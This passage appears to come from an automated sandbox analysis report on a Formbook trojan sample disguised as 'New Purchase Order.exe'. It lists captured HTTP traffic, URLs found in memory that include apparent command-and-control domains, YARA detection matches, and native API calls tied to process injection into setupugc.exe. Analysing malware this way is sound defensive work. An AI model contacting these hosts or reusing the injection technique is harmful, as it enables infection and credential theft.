20 20 20 20 20 20 69 64 3d
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 18 Sep 2024 07:03:49 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 16052X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 
2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 18 Sep 2024 07:03:51 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 16052X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 
74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20
            Source: setupugc.exe, 00000011.00000002.3379647495.0000000004044000.00000004.10000000.00040000.00000000.sdmp, SguBfrlSDIFxPr.exe, 00000014.00000002.3379292512.0000000002D14000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2689415276.0000000039C64000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=
            Source: New Purchase Order.exe, 00000000.00000002.2165111682.0000000002EED000.00000004.00000800.00020000.00000000.sdmp, hbaiQWstL.exe, 0000000A.00000002.2312499541.000000000351D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: SguBfrlSDIFxPr.exe, 00000014.00000002.3381064714.0000000004DB3000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.angelenterprise.biz
            Source: SguBfrlSDIFxPr.exe, 00000014.00000002.3381064714.0000000004DB3000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.angelenterprise.biz/efkd/
            Source: setupugc.exe, 00000011.00000002.3382169022.0000000007EE8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: setupugc.exe, 00000011.00000002.3382169022.0000000007EE8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: setupugc.exe, 00000011.00000002.3379647495.000000000481E000.00000004.10000000.00040000.00000000.sdmp, SguBfrlSDIFxPr.exe, 00000014.00000002.3379292512.00000000034EE000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: setupugc.exe, 00000011.00000002.3382169022.0000000007EE8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: setupugc.exe, 00000011.00000002.3382169022.0000000007EE8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: setupugc.exe, 00000011.00000002.3382169022.0000000007EE8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: setupugc.exe, 00000011.00000002.3382169022.0000000007EE8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: setupugc.exe, 00000011.00000002.3382169022.0000000007EE8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: setupugc.exe, 00000011.00000002.3376763818.00000000031B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: setupugc.exe, 00000011.00000003.2567790665.0000000007ECA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: setupugc.exe, 00000011.00000002.3376763818.00000000031B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
            Source: setupugc.exe, 00000011.00000002.3376763818.00000000031B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: setupugc.exe, 00000011.00000002.3376763818.00000000031DC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033(
            Source: setupugc.exe, 00000011.00000002.3376763818.00000000031B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: setupugc.exe, 00000011.00000002.3376763818.00000000031B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: setupugc.exe, 00000011.00000002.3376763818.00000000031B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: setupugc.exe, 00000011.00000002.3382169022.0000000007EE8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
            Source: setupugc.exe, 00000011.00000002.3379647495.000000000468C000.00000004.10000000.00040000.00000000.sdmp, SguBfrlSDIFxPr.exe, 00000014.00000002.3379292512.000000000335C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.masteriocp.online/wg84/?np=xCESFhhZDtyM/hr//j3ky1xZxbv/w7yscVTptQKfPtsk1ZKvJSltY0eiWzxDT

            E-Banking Fraud

            Source: Yara match | File source: 9.2.New Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 9.2.New Purchase Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000009.00000002.2390888509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000011.00000002.3378481674.0000000003350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.2391347243.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000011.00000002.3376676008.0000000003140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000014.00000002.3381064714.0000000004D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000002.3379021381.0000000002F50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.2393013278.00000000024F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 9.2.New Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 9.2.New Purchase Order.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.2390888509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000011.00000002.3378481674.0000000003350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.2391347243.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000011.00000002.3376676008.0000000003140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000011.00000002.3376249726.0000000000CE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000014.00000002.3381064714.0000000004D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000010.00000002.3379021381.0000000002F50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.2393013278.00000000024F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: initial sample | Static PE information: Filename: New Purchase Order.exe
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_0042C593 NtClose,9_2_0042C593
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01812B60 NtClose,LdrInitializeThunk,9_2_01812B60
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01812DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_01812DF0
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01812C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_01812C70
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_018135C0 NtCreateMutant,LdrInitializeThunk,9_2_018135C0
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01814340 NtSetContextThread,9_2_01814340
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01814650 NtSuspendThread,9_2_01814650
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01812B80 NtQueryInformationFile,9_2_01812B80
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01812BA0 NtEnumerateValueKey,9_2_01812BA0
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01812BE0 NtQueryValueKey,9_2_01812BE0
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01812BF0 NtAllocateVirtualMemory,9_2_01812BF0
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01812AB0 NtWaitForSingleObject,9_2_01812AB0
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01812AD0 NtReadFile,9_2_01812AD0
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01812AF0 NtWriteFile,9_2_01812AF0
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01812DB0 NtEnumerateKey,9_2_01812DB0
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01812DD0 NtDelayExecution,9_2_01812DD0
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01812D00 NtSetInformationFile,9_2_01812D00
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01812D10 NtMapViewOfSection,9_2_01812D10
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01812D30 NtUnmapViewOfSection,9_2_01812D30
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01812CA0 NtQueryInformationToken,9_2_01812CA0
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01812CC0 NtQueryVirtualMemory,9_2_01812CC0
            Source: C:\Users\user\Desktop\New Purchase Order.exe | Code function: 9_2_01812CF0 NtOpenProcess,9_2_01812CF0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812C00 NtQueryInformationProcess,9_2_01812C00
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812C60 NtCreateKey,9_2_01812C60
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812F90 NtProtectVirtualMemory,9_2_01812F90
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812FA0 NtQuerySection,9_2_01812FA0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812FB0 NtResumeThread,9_2_01812FB0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812FE0 NtCreateFile,9_2_01812FE0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812F30 NtCreateSection,9_2_01812F30
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812F60 NtCreateProcessEx,9_2_01812F60
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812E80 NtReadVirtualMemory,9_2_01812E80
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812EA0 NtAdjustPrivilegesToken,9_2_01812EA0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812EE0 NtQueueApcThread,9_2_01812EE0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812E30 NtWriteVirtualMemory,9_2_01812E30
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01813090 NtSetValueKey,9_2_01813090
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01813010 NtOpenDirectoryObject,9_2_01813010
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018139B0 NtGetContextThread,9_2_018139B0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01813D10 NtOpenProcessToken,9_2_01813D10
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01813D70 NtOpenThread,9_2_01813D70
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A4340 NtSetContextThread,LdrInitializeThunk,17_2_036A4340
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A4650 NtSuspendThread,LdrInitializeThunk,17_2_036A4650
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2B60 NtClose,LdrInitializeThunk,17_2_036A2B60
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2BE0 NtQueryValueKey,LdrInitializeThunk,17_2_036A2BE0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,17_2_036A2BF0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2BA0 NtEnumerateValueKey,LdrInitializeThunk,17_2_036A2BA0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2AF0 NtWriteFile,LdrInitializeThunk,17_2_036A2AF0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2AD0 NtReadFile,LdrInitializeThunk,17_2_036A2AD0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2F30 NtCreateSection,LdrInitializeThunk,17_2_036A2F30
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2FE0 NtCreateFile,LdrInitializeThunk,17_2_036A2FE0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2FB0 NtResumeThread,LdrInitializeThunk,17_2_036A2FB0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2EE0 NtQueueApcThread,LdrInitializeThunk,17_2_036A2EE0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2E80 NtReadVirtualMemory,LdrInitializeThunk,17_2_036A2E80
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2D30 NtUnmapViewOfSection,LdrInitializeThunk,17_2_036A2D30
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2D10 NtMapViewOfSection,LdrInitializeThunk,17_2_036A2D10
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2DF0 NtQuerySystemInformation,LdrInitializeThunk,17_2_036A2DF0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2DD0 NtDelayExecution,LdrInitializeThunk,17_2_036A2DD0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2C60 NtCreateKey,LdrInitializeThunk,17_2_036A2C60
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2C70 NtFreeVirtualMemory,LdrInitializeThunk,17_2_036A2C70
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2CA0 NtQueryInformationToken,LdrInitializeThunk,17_2_036A2CA0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A35C0 NtCreateMutant,LdrInitializeThunk,17_2_036A35C0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A39B0 NtGetContextThread,LdrInitializeThunk,17_2_036A39B0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2B80 NtQueryInformationFile,17_2_036A2B80
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2AB0 NtWaitForSingleObject,17_2_036A2AB0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2F60 NtCreateProcessEx,17_2_036A2F60
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2FA0 NtQuerySection,17_2_036A2FA0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2F90 NtProtectVirtualMemory,17_2_036A2F90
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2E30 NtWriteVirtualMemory,17_2_036A2E30
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2EA0 NtAdjustPrivilegesToken,17_2_036A2EA0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2D00 NtSetInformationFile,17_2_036A2D00
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2DB0 NtEnumerateKey,17_2_036A2DB0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2C00 NtQueryInformationProcess,17_2_036A2C00
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2CF0 NtOpenProcess,17_2_036A2CF0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A2CC0 NtQueryVirtualMemory,17_2_036A2CC0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A3010 NtOpenDirectoryObject,17_2_036A3010
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A3090 NtSetValueKey,17_2_036A3090
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A3D70 NtOpenThread,17_2_036A3D70
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036A3D10 NtOpenProcessToken,17_2_036A3D10
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_00D08FD0 NtCreateFile,17_2_00D08FD0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_00D09140 NtReadFile,17_2_00D09140
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_00D092D0 NtClose,17_2_00D092D0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_00D09230 NtDeleteFile,17_2_00D09230
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_00D09430 NtAllocateVirtualMemory,17_2_00D09430
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0373B16B17_2_0373B16B
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0367B1B017_2_0367B1B0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0372F0E017_2_0372F0E0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_037270E917_2_037270E9
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036770C017_2_036770C0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0371F0CC17_2_0371F0CC
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0372F7B017_2_0372F7B0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036B563017_2_036B5630
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_037216CC17_2_037216CC
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0372757117_2_03727571
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0370D5B017_2_0370D5B0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0366146017_2_03661460
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0372F43F17_2_0372F43F
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0372FB7617_2_0372FB76
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036ADBF917_2_036ADBF9
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036E5BF017_2_036E5BF0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0368FB8017_2_0368FB80
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036E3A6C17_2_036E3A6C
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03727A4617_2_03727A46
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0372FA4917_2_0372FA49
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0371DAC617_2_0371DAC6
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_036B5AA017_2_036B5AA0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_03711AA317_2_03711AA3
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0370DAAC17_2_0370DAAC
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0367995017_2_03679950
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 17_2_0368B95017_2_0368B950
